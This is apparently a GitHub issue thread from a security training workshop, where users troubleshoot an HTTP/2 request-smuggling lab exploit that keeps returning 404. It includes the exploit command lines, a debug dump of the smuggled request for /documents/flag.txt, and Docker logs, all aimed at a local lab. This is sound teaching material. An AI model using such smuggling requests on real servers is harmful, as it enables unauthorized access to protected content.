GoSecure
LAB2 always returns 404
Hi, I was running LAB2, but I was not able to get successful results. Python script always returned 404 and HRS result false [+] Request 1 /static/diagram_full_size.png => 200 [+] Request 2 /static/not_found => 404 [+] HRS successful: False
Tried this setup on couple of different Linux servers but in both cases no success. Happy to show if needed.
@vbrazauskas Can you provide the output from the Docker logs? It will be possible to see what request are reaching the backend.
One of the common issue is the new lines being malformed from the smuggled request. I had several cases where this biten me so that's why there is the monstrocity of chained replace functions. https://github.com/GoSecure/request-smuggling-workshop/blob/26aee456e4ea97838f089ea7ada92a80c669deb1/02_http2_cl/exploit_http2_hrs.py#L5-L9
@h3xstream Hi, the LAB2 returns 404
DOCKER LOG: [+] Running 3/0 ⠿ Container 02_http2_cl-webstatic-1 Created 0.0s ⠿ Container 02_http2_cl-webmain-1 Created 0.0s ⠿ Container 02_http2_cl-armeria-1 Created 0.0s Attaching to 02_http2_cl-armeria-1, 02_http2_cl-webmain-1, 02_http2_cl-webstatic-1 02_http2_cl-webstatic-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.4. Set the 'ServerName' directive globally to suppress this message 02_http2_cl-webmain-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.3. Set the 'ServerName' directive globally to suppress this message 02_http2_cl-webstatic-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.4. Set the 'ServerName' directive globally to suppress this message 02_http2_cl-webmain-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.3. Set the 'ServerName' directive globally to suppress this message 02_http2_cl-webstatic-1 | [Mon May 01 14:52:51.508159 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.51 (Debian) PHP/8.0.13 configured -- resuming normal operations 02_http2_cl-webstatic-1 | [Mon May 01 14:52:51.508275 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' 02_http2_cl-webmain-1 | [Mon May 01 14:52:51.509925 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.51 (Debian) PHP/8.0.13 configured -- resuming normal operations 02_http2_cl-webmain-1 | [Mon May 01 14:52:51.510042 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' 02_http2_cl-armeria-1 | SLF4J: Failed to load class "org.slf4j.impl.StaticLoggerBinder". 02_http2_cl-armeria-1 | SLF4J: Defaulting to no-operation (NOP) logger implementation 02_http2_cl-armeria-1 | SLF4J: See http://www.slf4j.org/codes.html#StaticLoggerBinder for further details. 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:52:53 +0000] "PRI * HTTP/2.0" 400 484 "-" "-" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:52:53 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:52:58 +0000] "PRI * HTTP/2.0" 400 484 "-" "-" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:52:58 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:02 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:09 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:13 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:19 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:20 +0000] "POST /static/diagram_full_size.png HTTP/1.1" 200 41212 "-" "python-httpx/0.24.0" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:20 +0000] "GET /static/not_found HTTP/1.1" 404 432 "-" "python-httpx/0.24.0" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:24 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:30 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:34 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:40 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:45 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:50 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:56 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:01 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:06 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:10 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:16 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:22 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:25 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:33 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:33 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2" 02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:42 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2" 02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:42 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
RUNNING THE PYTHON TOOL: python3 exploit_http2_hrs.py --host https://localhost:8443/ --url1 /static/diagram_full_size.png --url1s /documents/flag.txt --url2 /static/not_found [+] Request 1 /static/diagram_full_size.png => 200 [+] Request 2 /static/not_found => 404 [+] HRS successful: False [+] Response from second request: b'\n
\nNot Found
\nThe requested URL was not found on this server.
\n\nApache/2.4.51 (Debian) Server at webstatic Port 80\n\n'
Same problem running Docker Compose 2.27.0 on Kali 2024.2, but I don't think this is the problem. Follows the exploit:
python exploit_http2_hrs.py --host https://localhost:8443 --url1 /static/style.css --url1s /documents/flag.txt --url2 /not/found --debug
[+] Request 1 /static/style.css => 200
[+] Request 2 /not/found => 404
[+] HRS successful: False
Request 1:
{{{{
POST https://localhost:8443/static/style.css HTTP/2
host: localhost:8443
accept: */*
accept-encoding: gzip, deflate, br
connection: keep-alive
user-agent: python-httpx/0.27.0
content-length: 0
b'GET /documents/flag.txt HTTP/1.1\r\nHost: localhost\r\n\r\n'
}}}}
Request 2:
{{{{
GET https://localhost:8443/not/found HTTP/2
host: localhost:8443
accept: */*
accept-encoding: gzip, deflate, br
connection: keep-alive
user-agent: python-httpx/0.27.0
b''
}}}}
[+] Response from second request:
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.51 (Debian) Server at webmain Port 80</address>\n</body></html>\n'
From docker console I got 200 indeed:
...
webstatic-1 | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "POST /static/style.css HTTP/1.1" 200 0 "-" "python-httpx/0.27.0"
webstatic-1 | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "GET /documents/flag.txt HTTP/1.1" 200 2463 "-" "-"
webmain-1 | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "GET /not/found HTTP/1.1" 404 430 "-" "python-httpx/0.27.0"
...
I'm not particulary interested to make the script to work, but I will appreciate greately any indications about how to retrive the content of the smuggled request.
Thank you
